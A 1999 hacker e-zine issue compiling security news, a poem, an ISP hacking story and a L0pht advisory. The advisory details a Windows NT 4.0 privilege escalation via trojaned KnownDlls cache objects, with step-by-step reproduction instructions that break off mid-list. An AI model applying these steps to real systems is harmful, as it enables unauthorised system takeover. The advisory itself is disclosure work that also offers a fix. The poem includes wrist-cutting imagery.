      *issue #6 i'm wondering if we can really pull off a weekly release as
      *hoped. I mean hopefully not too many people are getting caught and not
      *too many sites (bah hahahaha yeah right) are being vandalized by the script
      *kiddiez etc. Work continues on hwa-iwa.org which is running Debian Linux at
      *this time, i'm playing around with some stuff there but don't bother port
      *scanning etc u won't find anything interesting on that box unless you really
      *want to snarf half written articles <grin> etc ... besides if you did break
      *in i'd just end up writing a story about it so whats the point? *g* moving
      *right along, thanks for the continued support everyone and tty next time...
      */
      printf ("EoF.\n");
      }


      www.hwa-iwa.org is now online but not ready for primetime yet, if you go
      there you will just be presented with a link to the HWA.hax0r.news mirrors
      the site is under major development and will be announced here when it goes
      "online for primetime" with webboard and file archives etc etc, stay tuned
      for more as it becomes available ie: as I get it done ... ;)
      
      Issue #6! ... w00t w00t w00t! ... 
      
      w00t! /`wu:t n & v w00ten /`wu:ten n & v Eng. Unk.
        1. A transcursion or transcendance into joy from an otherwise inert state
        2. Something Cruciphux can't go a day without typing on Efnet
     
      Congrats, thanks, articles, news submissions and kudos to us at the
     main address: hwa@press.usmc.net complaints and all nastygrams and 
     mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 
     127.0.0.1, private mail to cruciphux@dok.org

     danke.

     C*:.


     @HWA


 03.0  Army Signal Command protecting networks from hackers
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      To: InfoSec News <isn@repsec.com>
      Subject: [ISN] Army Signal Command protecting networks from hackers
      
      
      http://www.dtic.mil/armylink/news/Feb1999/a19990211hacksec.html
      Army Signal Command protecting networks from hackers
      by Sgt. 1st Class Jim Ward
      
      FORT HUACHUCA, Ariz., (Army News Service, Feb. 11, 1999) -- Soldiers on
      patrol in countries spanning the globe are the sentries who keep enemies
      at bay. Even as they stand guard at the dawn of the new century, a system
      called information assurance is doing likewise -- with them in mind. 
      
      Information assurance is the umbrella term for what is a new way to ensure
      that the military's computer networks withstand withering attacks from
      foreign and domestic hackers. 
      
      Leading the charge in this effort is a team of computer networkers and
      specialists with the U.S.� Army Signal Command. This team has been working
      since March 1998 to accomplish a mission handed down from the highest
      levels of the defense leadership. 
      
      According to Lt. Col. James M. Withers, the head of the team, the team's
      charter is simple: devise a strategy that will keep critical networks as
      safe from intrusion as possible, and an action plan to help get there. 
      
      "Our mission, as outlined by the Army vice chief of staff is to implement
      near real time, worldwide, common picture of the Army's Military
      Information Environment," Withers said. 
      
      This was done by combining the Army's Information Service Provider
      functions with the Army Regional Computer Emergency Response Team. This,
      according to Withers, ensures that reporting of this common picture of
      this Military Information Environment to a central coordination center,
      located at Fort Huachuca. 
      
      "This action provided the Army Signal Command with an enhanced acquisition
      of unified and global near-real-time protect, detect and react
      capabilities through the lash-up of these two functions,"� Withers said. 
      
      Withers said that this process involves computer systems specialists from
      around the world. These personnel, in tandem with the Army Regional
      Computer Emergency Response Team, combine forces to detect hackers and
      others as soon as possible before damage can be done. 
      
      Computer systems specialists with the 1st Signal Brigade in Korea, the
      516th Signal Battalion in Hawaii and the 5th Signal Command in Germany
      operate and maintain Network and Systems Operations Centers. These
      soldiers and civilians are responsible for the detection effort in their
      theaters and report activity to the Army Signal Command headquarters. 
      
      Once at the ASC level, Army Network and Systems Operations Center staff
      performs over-watch on most of the Army's networks. This is an effort to
      keep the networks humming along, providing the information lifeline
      soldiers rely on as they perform their peace enforcement role around the
      world. 
      
      All of this, Withers said, is being done to ensure the Army's critical
      circuits and information systems don't fall prey to "cyberterrorists," who
      wish to do damage to the Army's ability to protect America. "The Army is
      in the lead in this battle thanks to the can-do attitude of the team that
      assembled here at ASC headquarters several months ago," Withers said. 
      
      
Now that the team has slammed the door on these terrorists and locked up
      the networks, the need for constant vigilance goes on. That's where the
      Regional Computer Emergency Response Team and its theater-level
      counterparts come in. 
      
      "Without the human element, this mission won't get done. The soldier is at
      the tip of the spear,"� Withers said. "Our team is a part of the process
      -- from fort to foxhole." 
      
      (Editor's note: Ward is with the U.S. Army Signal Command's Public Affairs
      Office at Fort Huachuca, Ariz.) 
      
      -o-
      Subscribe: mail majordomo@repsec.com with "subscribe isn".
      Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]

      @HWA
      
 03.1 The Key To Unlocking Data Access
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      To: InfoSec News <isn@repsec.com>
      Subject: [ISN] The Key to Unlocking Data Access
          
      
      Tuesday, February 16, 1999, 2:00 p.m. ET. 
      The Key To Unlocking Data Access
      By RUTRELL YASIN 
      
      Enterprises are finally doing something about their insecure intranets and
      extranets. Public-key infrastructure (PKI) technology--until now used
      mostly to secure Internet transactions in banking and other financial
      applications--is now reaching deep into corporate departments and everyday
      business applications. 
      
      Enterprises can no longer operate without a PKI safety net as they extend
      applications and data to partners and far-flung employees. 
      
      Companies are looking for their "return on investment with PKI to come
      from [securing] business-to-business and internal applications such as
      human resources systems," says John Pescatore, a senior consultant with
      PKI vendor Entrust Technologies Inc. 
      
      Leading the way are corporate titans such as Federal Express Corp.,
      NationsBank Corp. and Texas Instruments Inc., all of which are piloting
      projects that could set the stage for internal PKI deployment for
      authentication, privacy and data integrity. 
      
      Federal Express is out in front. Fedex hopes to reap the benefits of PKI
      this spring as it rolls out a digital signature-enabled human resources
      system that gives the company's 141,000 employees secure access to their
      personnel files. 
      
      Fedex, which is using Entrust encryption-key management, secure e-mail and
      application development tools, worked closely with Entrust to migrate the
      mainframe-based HR systems to an intranet. 
      
      "When we first started with PKI, we found all the PKI vendors were
      following an Internet model, not an intranet model," says James Candler,
      Fedex's vice president of personnel systems and support.� Changes were
      required to plug PKI into an intranet environment in which users might use
      multiple workstations, he says. 
      
      With Internet transactions, the model is much simpler: a home user
      conducting a transaction with a bank can download a digital
      certificate--electronic signatures that verify a user's identity--to a PC,
      and the information is specific to that computer. 
      
      However, in a corporate setting such as Fedex, departmental and field
      users need access to desktop PCs in conference rooms and at kiosks.
      Single-system digital certificates are not enough. 
      
      As a result, Fedex "had to create roaming certificates" that could be
      downloaded to a PC from an LDAP-based corporate directory, Candler says. 
      
      Using an Entrust digital certificate password and hardware ID tokens that
      resemble credit cards, Fedex wants its managers to transmit employee
      performance appraisals over the intranet, for example, eliminating a lot
      of paperwork. 
      
      But at $65 apiece, the company didn't want to give every employee a secure
      ID token. "We created a level of trust in the HR system," so employees who
      don't need access to a higher level of information can log on with just a
      passphrase, Candler says. 
      
      One benefit is that the implementation of PKI encryption and digital
      certificates is letting Fedex employees perform tasks on the Web that they
      couldn't before, Candler notes. For example, employee salary reviews are
      now sent to a supervisor via an e-mail message that includes a URL address
      
linking directly to the appropriate HR site where the review is written.
      Then the supervisor can forward the information on to HR. 
      
      Candler thinks other companies will add Web extensions to their HR systems
      to give employees self-service access to benefit and retirement plans. 
      
      "I've talked to other CIOs, and they agree that this is exactly where
      their companies need to go,"� Candler says. "We're leading the market by
      about a year," he says. 
      
      But as organizations deploy PKI, product interoperability and certificate
      management have become problematic. 
      
      NationsBank, a unit of $6.5 billion Bank of America, has launched pilot
      projects to give employees access to personnel records, 401(k) and other
      benefits, says Sam Phillips, senior vice president of information security
      at the bank. 
      
      PKI is generating "a lot of excitement," Phillips says. However, "like
      most companies, we want to standardize on one e-mail package. We are a
      very large organization constantly in acquisition" mode, he says. If one
      division is using Lotus Notes and the other Microsoft Exchange, the
      question is how to make the packages work together so that an S/MIME
      security implementation works across both systems, he says. 
      
      Another obstacle is directory services, specifically ensuring
      interoperability between LDAP interfaces from Microsoft, Netscape and
      Novell, he says. 
      
      To overcome some of these interoperability problems, NationsBank is using
      VeriSign Inc.'s Onsite integrated platform as a primary Certificate
      Authority. VeriSign "gives us flexibility," Phillips says. Instead of
      NationsBank setting up the PKI infrastructure internally, "VeriSign offers
      a complete set of services. We can leverage what they're doing" to
      communicate with GTE CyberTrust or Netscape if customers choose
      certificates from those vendors, he says. 
      
      Even electronics giant Texas Instruments opted for VeriSign, scrapping
      plans to launch a homegrown PKI framework. 
      
      "We actually built our own PKI, which was fairly robust, but we wanted to
      concentrate on our core competency," says John Fraser, IT security manager
      at the $8.4 billion manufacturer. "To deploy PKI, you had to pull together
      the servers, desktops, clients, the whole ball of wax," Fraser says. 
      
      "We wanted to be in the position as the market changes to move to the next
      new solution in PKI without changing" the whole infrastructure, Fraser
      says. Because VeriSign is based on an open platform, off-the-shelf
      security products can be integrated into the framework, reducing costs. 
      
      TI will deploy PKI both for intranets and Internet apps, Fraser says. "But
      our plan is not to use VeriSign digital certificates for
      customer-to-business transactions--not like the banking model." 
      
      TI has launched a program to forge tighter links with suppliers and to
      extend its intranet to accommodate more self-service apps, he says. 
      
      As the company deployed PKI technology and digital certificates, the
      biggest hurdles were managing a certificate revocation list and key escrow
      for employees who forgot passwords, Fraser says. 
      
      VeriSign is attempting to solve that problem with OnSite Key Manager,
      which provides encrypted backup and recovery of end-user keys and digital
      
certificates used within a PKI. 
      
      For the past year, Entrust, VeriSign and other PKI vendors have been
      offering tools that make it easier to manage multiple certificates from
      different vendors as well as add, change and revoke certificates. 
      
      Securing access to enterprise resource planning apps such as SAP is the
      next step for TI's PKI efforts, Fraser says. TI plans to deploy digital
      certificates for SAP's Internet Transaction Server, he says. 
      
      ERP applications weren't offering links to PKI a year ago, Fraser says.
      Now SAP, PeopleSoft and Oracle realize their proprietary solutions have to
      be extended to acknowledge technologies such as Kerberos authentication
      and PKI. 
      
      Users are asking about PKI extensions to apps from PeopleSoft and SAP, as
      well as enterprise management platforms such as Computer Associates'
      Unicenter TNG and Tivoli Systems Inc.'s TME, Pescatore says. 
      
      Management platforms are the likely places to add hooks for security
      modules. "The same platform that is used for managing resources also can
      be used to manage people using digital certificates. This way, VPNs,
      switches and routers all can be tied in with PKI," he says. 
      
      The government of Ontario, Canada, has several pilot projects with Entrust
      that should bear fruit this year, says Scott Campbell, assistant deputy
      minister there. The government is issuing digital certificates to social
      workers at the 50 Children's Aide Societies across the province to ensure
      privacy. The certificates will let case workers securely access a central
      database to keep track of child abuse cases. 
      
      The database is updated regularly, so workers can keep better tabs on
      abused children if they move from Toronto, for example, to Ottawa,
      Campbell says. Prior to the pilot, it could take months for workers to
      track down the whereabouts of a child. 
      
      Ontario also uses PKI to secure e-mail for the 6,000-person Ontario
      Provincial Police force. A third pilot will help the 300-person IT group
      determine if there are any holes in the technology, he says. 
      
      As users deploy PKI pilots, they may find the real challenge is defining
      policies that link the technology with business processes, says Spiros
      Angelopoulos, a group manager with Raytheon at the NASA Ames Research
      Center. 
      
      "The tools are there, but [companies must define] policies on how to
      implement the tools," he says.� For example, with digital certificates,
      companies need to establish a policy for user eligibility and how users
      will receive their credentials, he says. 
      
      NASA Ames, which has 11 research centers across the nation, is using PKI
      for secure e-mail. The center is moving toward the day when "every person
      [at the center] will have a digital certificate,"� Angelopoulos says. 
      
      As PKI products continue to mature and pilots move into production this
      year, IT managers anticipate a surge in PKI deployments. Says TI's Fraser:
      "There's more than a [growing] interest in PKI; there's a lot of pent-up
      demand." 
      
      
      -o-
      Subscribe: mail majordomo@repsec.com with "subscribe isn".
      Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]
      
      @HWA
      
 03.2  Online streaking, are you doing it right now??
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~     
       
       X-Authentication-Warning: enigma.repsec.com: majordomo set sender to owner-isn@repsec.com using -f
Received: from mail.inficad.com (mail.inficad.com [207.19.74.5])
	by enigma.repsec.com (9.0.1a/7.7.4.nospam) with ESMTP id OAA27245
	for <isn@repsec.com>; Wed, 17 Feb 1999 14:36:58 -0700
Received: from shadow.dimensional.com (root@shadow.pagan.net [206.124.26.20])
	by mail.inficad.com (8.9.2/8.9.0) with ESMTP id OAA08384
	for <isn@repsec.com>; Wed, 17 Feb 1999 14:54:04 -0700 (MST)
Received: from flatland.dimensional.com (jericho@flatland.dimensional.com [208.206.176.24])
	by shadow.dimensional.com (8.9.1/8.9.1) with SMTP id OAA26722
      for <isn@repsec.com>; Wed, 17 Feb 1999 14:52:48 -0700 (MST)
      To: InfoSec News <isn@repsec.com>
      Subject: [ISN] Are You Naked Online? How to Protect Your E-Privacy 
      X-Copyright: This e-mail copyright 1998 by jericho@dimensional.com where applicable
      
      
      Forwarded From: darek milewski <darekm@cmeasures.com>
      
      Are You Naked Online? How to Protect Your E-Privacy
      http://chkpt.zdnet.com/chkpt/adem2fpf/www.anchordesk.com/story/story_3102.html
      Jesse Berst, Editorial Director
      Wednesday, February 17, 1999
      
      Remember streakers? Those nutty nudes of the seventies who darted across
      college campuses? 
      
      I was always too uptight to join their au naturel jaunts.� Now, more than
      20 years later, every Netizen risks total exposure. Of email messages. Of
      medical records. Of places surfed. 
      
      I still don't want to bare all. While most Internet businesses work hard
      to protect your privacy, human screw-ups still happen. That's why these
      recent headlines worry me: 
      
      Patient Records on Web: Patient records -- containing names, phone and
      Social Security numbers, and medical treatments -- at the University of
      Michigan Medical Center inadvertently lingered on public Web sites for two
      months.� Click for more. 
      
      Valentine's Day Cards Not Private: A programming glitch at the Hallmark
      Cards Web site enabled curious folks to read other people's love notes --
      and names, home and email addresses and places of employment. (Does Ken
      Starr know about this site?) Click for more. 
      
      FreePCs Raise Privacy Concerns: More than 500,000 people submitted
      personal information in a bid to win one of only 10,000 free PCs, which
      will record user behavior.� In other words, 490,000 people gave away their
      privacy to enter a contest.� In this case the stupidity was on the part of
      the user. Click for more. 
      
      Prodded by paranoia, I investigated ways to protect me and my data from
      prying eyes. Good news: There are ways to prevent online exposure. 
      
      Abstinence: The safest way to avoid unplanned privacy invasions is to
      control yourself. 
      
      Don't send super-personal information via email. (That's what FedEx is
      for.)� Don't offer unnecessary info. Bigbookstore.com doesn't need your
      height and weight.� Restrict access to your files. Insist on it with your
      doctor, banker and broker. 
      
      Privacy Policies: Scroll down to the bottom of any reputable Web site,
      including this one, and you'll notice a link to the privacy statement. It
      will tell you: 
      
      What info the site gathers about you What it does with the data With whom
      it shares the data
      
      If that policy's cool with you, browse freely. If not, surf elsewhere. 
      
      An independent consortium called TRUSTe verifies privacy statements and
      "stamps" its seal of approval on sites that abide by its standards. TRUSTe
      also oversees a site of its own where you can report privacy offenders.
      Click for more. 
      
      Encryption: Think of email notes as postcards -- anyone can read 'em. Many
      people rely on "security by obscurity"� to protect their email secrets. As
      in, "there's so much email zipping around no one's going to notice mine."
      Encryption is a better method. 
      
      Encryption Primer: Click for more.� Encryption Survival Guide: Encryption
      expert Robert Gelman discusses how to encrypt your email. Click for more. 
      Online Transactions: ZDTV reveals how encryption protects online shoppers.
      Click for more. 
      
      
      Be Vigilant: Despite my berst, er ... burst, of paranoia, there's no need
      to worry constantly about electronic privacy.� Let the professionals fret
      
for you. An occasional glance at one of their sites will keep you
      up-to-date. 
      
      
      Electronic Frontier Foundation: Non-profit organization that lobbies for,
      among other things, online privacy.� Click for more.� Electronic Privacy
      Information Center: Excellent EPIC features news, tool and resources.
      Click for more.� FreeCrypto: Encryption site with political bent. Click
      for more. 
      
      Unlike streaking, online privacy is not a passing fad.       
       
       
       @HWA
         
       
 04.0  France plays leapfrog with US over crypto laws..
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
       WTF is up with the French gov't?? who do they think they are? first its
      nukes now they're messing with crypto ... ok I sympathize with this one a
      bit but anyone who practices nukes in another country or at all for that 
      matter should be shat on then nuked. EoD - Ed
      
      Date: Wed, 17 Feb 1999 22:42:26 -0800
      From: "Dr. Vann Harl" <vann@schnags.com>
      Subject: France tell NSA to shove it
      
      
      FRANCE BREAKS RANKS WITH USA & AGAINST USA ON CODES
      
      By far the most significant intelligence and security news of
      the fortnight is French Prime Minister Lionel Jospin's 19
      January announcement that France is suddenly reversing its
      long-term and traditionally restrictive policy toward the
      public use of encryption systems and allowing complete freedom
      of use of systems with key lengths up to and including 128
      bits.� Currently, only 40 bit keys are legal and they must be
      deposited with a trusted third party ... of which there is only
      one recognized in all of France.� Under today's French law, the
      government has a right to understand any type of communication
      using public facilities, meaning post, telecommunications,
      semaphores, or what have you, although this law is seldom
      invoked publicly.
      
      The implication of this French decision goes far beyond France
      itself and is the first splash of a tidal change that will, in
      all likelihood, drown the international public encryption
      policy the US is trying to impose on the world in the name of
      fighting crime, drugs and terrorism.� France, which has
      probably suffered more deaths in the past few years from
      foreign terrorists than any other developed nation, "heard the
      players, questioned the experts and consulted its international
      partners" and explicitly decided that American high-tech
      eavesdropping and economic espionage is more detrimental to
      French interests than terrorists using encrypted
      communications.� The American menace is easily discernable in
      the opening lines of Mr. Jospin's statement concerning this
      tidal change in encryption policy:� "With the development of
      electronic espionage instruments, cryptography appears as an
      essential instrument of privacy protection."� No mention of
      crime, drugs or terrorists.
      
      Since the EU has already imposed much stronger privacy
      protection laws than the US, has debated the threat posed by
      the NSA Echelon worldwide telecommunications surveillance
      system, and has resisted "falling in line behind the FBI" on
      public eavesdropping, experts expect all EU countries to
      announce similar public encryption liberalization in the near
      future.� Indeed, this seems to be the developing EU strategy of
      letting the "uppity, snobbish Gallic French stand up to the
      Americans", something the French have always done with pride.
      Then, "once the rampart is breached", suddenly the other EU
      countries follow suit in a movement that could only have been
      negotiated and organized beforehand.� Specialists know it's
      coming on drug policies, but very few anticipated that a French
      Socialist government would stand up so unexpectedly to French
      security and intelligence services (which imposed the 40 bit
      key limit, a record lower limit in Western countries) and to
      the US.� Now it's done, the floodgates are open and watch
      what's going to happen ...� (...cut...)
      
      ---------------------------------------------

     
     @HWA

 05.0  More kewl poetry from Phiregod
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Before u read this excellent piece of prose, clear your mind of any shit
      that might be left over from your workaday meagre existance and ponder 
      the wisdom in the words, don't go off half-cocked coz it mentions gh0d 
      either the message is deep some of you will not get it, I think that I do,
      since my IQ is in the 150+ range but some of you dumbasses out there may
      have trouble with it <sarcasm> anyways read on and enjoy but keep your 
      flames to yourself, thanks phiregod for another really cool piece, 
      keep writing! - Ed 
       
      
      `_god42_'
      
      how many times do i have to walk down these halls humming 'in the name 
      of love' and searching my soul for the ability to accept myself and 
      
others for who and what we are before i know what it is that i'm 
      supposed to be doing with my life?
      
      how many times do i have to recite the lord's prayer before i feel the 
      peace i see etched in so many a worshipers' face, when will i know there 
      is a god and that will bring me what i see fulfilled in the heart of 
      everyone i pass on the streets?
      
      how many times do i have to cry for the world before a single tear is 
      shed on my behalf, why do i have to be the savior of my own soul when i 
      see so many that are in the hands of their own personal messiah?
      
      why do i have to be the one that bleeds?
      why am i the one that suffers the sins of the children?
      why do i not see a divine power?
      
      slowly but surely i see my ability to speak being taken away, first a 
      number on a pentium processor, then a barcode tattooed on my neck. 
      history is in words, life is in words, love is in words.
      
      i hunted my quarry and i held its beating heart in my hands before i 
      drank it's warm blood, i will not let this be taken from me. without 
      freedom my soul is but another caged bird that sings it's sorrow from 
      plastic perch. i will not exsist without my voice, the shred of sanity 
      that comforts me in the complacent warmth of my so called education.
      
      i'm in a battle field with no weapon to vanquish the mighty empires 
      except the reason i present without showing my face. like a single 
      scream of a victim in the night i want my words to evoke primal fear in 
      the expression of those that hear it. 
      
      this is the time that we must use our words not our fists, this is when 
      we win with our knowledge and skill rather then with hatred and money. 
      this is the point in time that we drop our swords and reveal our wrists 
      to be cut for it is the only way that we can show that we are not 
      afraid. this is where the world realizes its sins against its children.
      
      i'm failing english even tho i finally understand it's use. i'm slipping 
      out of irc when i finally found what it is i want to say. i'm 
      disappearing from my friend's eyes even tho i understand what it is that 
      they want to see. i'm feeling the grim reaper's breath on my neck even 
      tho its not me that he wants.
      
      this rant is over, my voice is weak, and my spirit is worn. i dont want 
      another promise or another wish, i want to wake up and know that i dont 
      have to defend my views, that people understand evil in all of it's 
      forms. i want to yell at the top of my lungs and know that everyone who 
      can hear me will. i dont want to see any more imprisioned for the very 
      things we should praise.
      
      dont sell out.
      
      amen,
      phiregod
      liquidphire@hotmail.com
      please excuse any grammatical or spelling errors
      (c) 1999 Phiregod/Liquid Phire and HWA.hax0r.news
      
      
      @HWA


 06.0 ISP cracks User's machine then threatens legal action on THEM
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Source: http://apcmag.com:8008/apcweb/forum.nsf/Headlines/133A922A7876969A4A2566FE00042BC0?OpenDocument
     Contributed by sAs via HNN contributed by _GryPhoNN_ 
     
     17/02/99
     Service & Reliability February 99: Hard drive hacked -- by ISP

     Roulla Yiacoumi (c) 1999

     When APC's Service & Reliability column received a phone call from an Internet
     user claiming his hard drive had been hacked into by his ISP, we had reservations.
     After all, this was something we had heard many times before, but had never seen
     proven.

     What made this time different, however, was that the user claimed he had received a letter from his provider explaining how it had
     committed the deed. Of course we were interested, but we still had no proof. So we asked the reader to forward the letter to us. 

     To our utter surprise, there were the words, in black and white. In an email addressed to the user, the provider wrote: "For your
     information, our network administrator, with very little effort, was able to violate your computer's security and examine the contents of
     your hard drive in only a few minutes." 

     We read it and re-read it. Surely no ISP would actually admit it had hacked a user's hard drive? 

     The name of this ISP? Internet Information Superhighway (IIS). Regular readers will recall that IIS was also the subject of a Service &
     Reliability column in March 1998 (see here), when a reader claimed he had been disconnected from the service after complaining
     about a fee increase. 

     So, what horrible offence had this user committed that IIS felt it was within its power to violate the user's hard drive? He had installed
     an option from the Windows 98 CD called 'HTTP Server' (part of 'Personal Web Server'), believing it was some kind of Web site
     creation tool. When he discovered it wasn't what he thought it was, he left it sitting on his hard drive until he received the
     heavy-handed letter from IIS which claimed it had "detected" the program on his machine, demanding it be immediately removed.
     Further, the provider had the gall to tell the reader that "operating such a service without the appropriate sanctions by the authorities
     offends State and Federal legislation, not to mention breaching our usage policy under our terms and conditions." 

     Now, we do not dispute that installing this program may have breached the ISP's terms and conditions. Indeed, it is in every user's
     best interests to read the online agreement before signing up with any provider and to make sure they understand what they can and
     can't do. However, to claim having this program offends state and federal legislation is ludicrous. There are no laws requiring users
     to seek approval before running a Web service. Indeed, when we asked IIS to clarify what it meant by these statements, we received
     a nasty legal letter -- but no answers. 

     The user told us he had contacted the Telecommunications Industry Ombudsman (TIO) and the NSW Commercial Crime Agency.
     We contacted both of these bodies to see what they had to say about this incident. 

     The TIO said that it had received this complaint and confirmed the matter had been referred to the NSW Police's Commercial Crime
     Agency. 

     We contacted the NSW Police and spoke to the Computer Crime Investigations Unit. A spokesperson confirmed the matter had
     been referred to them and had been investigated. Although no further action was taken against this ISP, the police have informed
     Service & Reliability that they would consider taking action against any ISP that acted with malicious intent, or without authority or
     lawful excuse in accessing data stored on a computer. 

     And, of course, we attempted to contact the ISP. As we had previously dealt with this ISP, we sent email to the three addresses we
     had on our books, but all three came back a day later saying they could not be delivered. 

     APC's daily news service Newswire (http://newswire.com.au/) published the story 'ISP busted for hacking' in November 1998 (see
     here). At the time of posting the story on its site, Newswire wrote that it was unable to contact IIS for comment. 

     When we later decided to run this story as part of Service & Reliability in the magazine, we again attempted to contact the ISP -- this
     time by fax. We sent a letter and a copy of the Newswire article, inviting the ISP to give its side of the story. We informed the
     provider that if it wished to respond via Australian Consolidated Press' lawyers, it was welcome to do so. (Australian Personal
     Computer is published by Australian Consolidated Press.) We requested a written response be forthcoming within one week. 

     Shortly before this deadline expired, our legal team received a written response from the provider's lawyer. It stated that "Newswire
     was not unable to contact my client as alleged" (false), that the NSW Commercial Crime Agency had not conducted an
     "investigation" into its client (we only stated that the police had investigated the matter), and that the user was "publishing
     pornographic material over the Internet using my client's service" -- a claim both the user and police instantly dismissed. 

     Further, the police added that the viewing and downloading of adult material over the Internet was not illegal (with the exception of
     child pornography, which was not an issue in this case). If the ISP suspected illegal activity on the part of a user, it is obligated to
     contact the police and not take matters into its own hands. 

     The ISP's lawyer demanded a retraction, claiming Newswire's article was "biased, distorted and malicious". It further accused the
     author of the article (yours truly) of being "involved in a conspiracy to falsely accuse my client of a crime", adding that this in itself is a
     crime "punishable by penal servitude for fourteen years". 

     Service & Reliability is a consumer column which seeks to address issues our readers have with hardware and software vendors,
     ISPs and related businesses. To present both sides of an issue, the vendor is invited and encouraged to respond to the reader's
     letter -- both the complaint and response are then published. If a vendor does not wish to submit a response, we will publish the
     complaint without it. 

     We do not succumb to the threat of legal proceedings -- regardless of who the vendor is. Our readers trust APC for its unbiased
     reporting and thoroughly investigated issues. 

     If you have any comments, drop me a line at ry@acp.com.au. 

     @HWA

 07.0 The l0pht releases new NT advisory
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                          L0pht Security Advisory

   
           Release date: February 18, 1999
            Application: Microsoft Windows NT 4.0
               Severity: any local user can gain administator privileges
                         and/or take full control over the system
                  
                 Author: dildog@l0pht.com
                    URL: http://www.L0pht.com/advisories.html

      ---
      Overview :
      ---
      
              Microsoft Windows NT 4.0 implements a system-wide cache of
      file-mapping objects for the purpose of loading system dynamic link
      libraries (DLLs) as quickly as possible. These cache objects, located in
      the system's internal object namespace, are created with permissions such
      that the 'Everyone' group has full control over them. Hence, it is
      possible to delete these cache objects and replace them with others that
      point to different DLLs. 
      
              When processes are created, the loader maps/loads the loading
      executable's imported DLLs into the process space. If there is a DLL cache
      object available, it is simply mapped into the process space, rather than
      going to the disk. Hence, there is an exploitable condition, when a
      low-privilege user replaces a DLL in the cache with a trojan DLL, followed
      by a high-privelege account launching a process. The high priveleged
      process will map in the trojan DLL and execute code on behalf of the low
      privelege use r. 
      
      --- 
      Affected systems:
      ---
      
              Windows NT 4.0 Server SP4
              Windows NT 4.0 Workstation SP4
              Other service packs are likely to be vulnerable, but the exploit has
              not been tested on them, neither has the fix presented below.
      
      ---
      Description :
      ---
      
              The Windows NT object namespace is the place where the kernel
      keeps the names of mutexes, semaphores, filemapping objects, and other
      kernel objects. It is organized hierarchically, like a directory
      structure. Amongst the directories are: 
              
              \Device
              \BaseNamedObjects
              \Driver
              \KnownDlls
              ...
              
              The NT object namespace is browsable with a tool called 'WinObj
      2.0' from System Internals (their website is http://www.sysinternals.com).
      You may wish to look around this namespace and browse the default
      permissions of objects. It is quiet entertaining, really.
      
              The "\Knowndlls" directory contains a list of DLLs in the
      c:\winnt\system32 directory, like: 
      
              \KnownDlls\COMCTL32.dll
              \KnownDlls\MPR.dll
              \KnownDlls\advapi32.dll
              \KnownDlls\kernel32.dll
              ..
      
              All of these objects are created at boot time, and are 'permanent
      shared objects'. Normally, users can not create permanent shared objects
      (it's an advanced user right, and it is normally not assigned to any
      group, even Administrators). But the system pr eloads this cache for you.
      Permanent shared objects differ from regular shared objects only in the
      fact that they have a flag set, and an incremented reference count, such
      that if you create one, and then terminate the creating process or close
      all handle s to the object, it does not disappear from the object space. 
      
              To exploit the poor permissions on this cache, one first needs to
      delete one of the shared objects by name, in order to later replace it. So
      we make a call to the NTDLL.DLL native function "OpenSection()", getting a
      handle to the object. Then we call the
      
       NTOSKRNL.EXE native function "ZwMakeTemporaryObject()" which removes the
      'permanent' flag and decrements the reference counter from the object. Now
      we just call NTDLL.DLL:NtClose() on the handle and it is destroyed. 
      
              To create a section, one calls NTDLL.DLL:CreateSection(), which is
      undocumented. There are other calls one needs to make in order to set up
      the object and open the KnownDlls directory, but they are trivial and will
      not be discussed here. Feel free to bro wse the source code presented at
      the end of this advisory to see what you need to do though. Anyway, you
      create a section (aka file-mapping) object that points to a trojan DLL. A
      good candidate for DLL trojan is KERNEL32.DLL, since it is loaded by
      pretty much every executable you're going to run.
       
              Note that any DLL cache objects you create as a user can not be
      'permanent', hence, when you log out, the cache object _will_ disappear.
      So how can we get a higher privelege process to run while we're logged in?
      There are many ways. We can wait for an 'A t' job to go off, or we can set
      up the DLL hack as an 'At' job that goes off when someone else is logged
      in. But more reliable is this: 
              
              When a new Windows NT subsystem is started, it creates a subsystem
      process to handle various system details. Examples of these processes are
      LSASS.EXE and PSXSS.EXE. The PSXSS.EXE is the POSIX subsystem. But since
      no one ever really uses the POSIX subsys tem under NT. So, chances are, it
      won't be loaded into memory yet. Once it is, though, it's loaded until the
      machine reboots. If it loaded, reboot the machine, and it won't be :P. 
      
              So, we launch our DLL cache hack, and then run a POSIX subsystem
      command, thus launching PSXSS.EXE (which runs as 'NT AUTHORITY\SYSTEM',
      the system account), and running our DLL with local administrator
      privileges. Incidentally, other subsystems have the
      
       same effect, such as the OS/2 subsystem (the only other one that probably
      isn't started yet). 
      
      --- 
      Workarounds/Fixes:
      ---
              
              I developed a patch for this security problem in the form of a
      Win32 Service program that can be installed by the Administrator of the
      system. It sets itself to run every time the system is started, and before
      the user has the opportunity to start a program, it adjusts the
      permissions of the DLL cache to something much safer. The source code for
      t his service is also provided, along with a compiled version. Links to
      the programs can be found at http://www.l0pht.com/advisories.html. 
      
              One can verify the validity of the patch by downloading the WinObj
      v2.0 tool from System Internals (www.sysinternals.com) and inspecting the
      permissions of the KnownDlls directory, and the section objects within it. 
      
              Microsoft has been sent a copy of this advisory, and I would
      expect a hotfix from them at some point in the near future. 
      
      ---
      Example :
      ---
      
              I wrote up a trojan to test exploitability, and it was a simple
      'forwarder' DLL that had the same exported names as KERNEL32.DLL, but a
      different 'DllMain()' function, to be called when the DLL is loaded. The
      function calls in my trojan, simply forward o ff to the real KERNEL32.DLL
      calls located in a copy of the kernel that you make in 'REALKERN.DLL' in
      the c:\temp directory. 
      
              To try out this vulnerability, obtain an account as a
      low-privilege guest user (referred to as 'Dick') and do the following: 
      
              1. Log in as Dick at the console.
              2. Start up two "cmd.exe" shells. Do the following in one of them.
              3. Copy c:\winnt\system32\kernel32.dll to c:\temp\realkern.dll
      (The egg dll is hard coded to use the c:\temp directory to find this file.
      If you can't put it in c:\temp, then modify the source '.def' file to
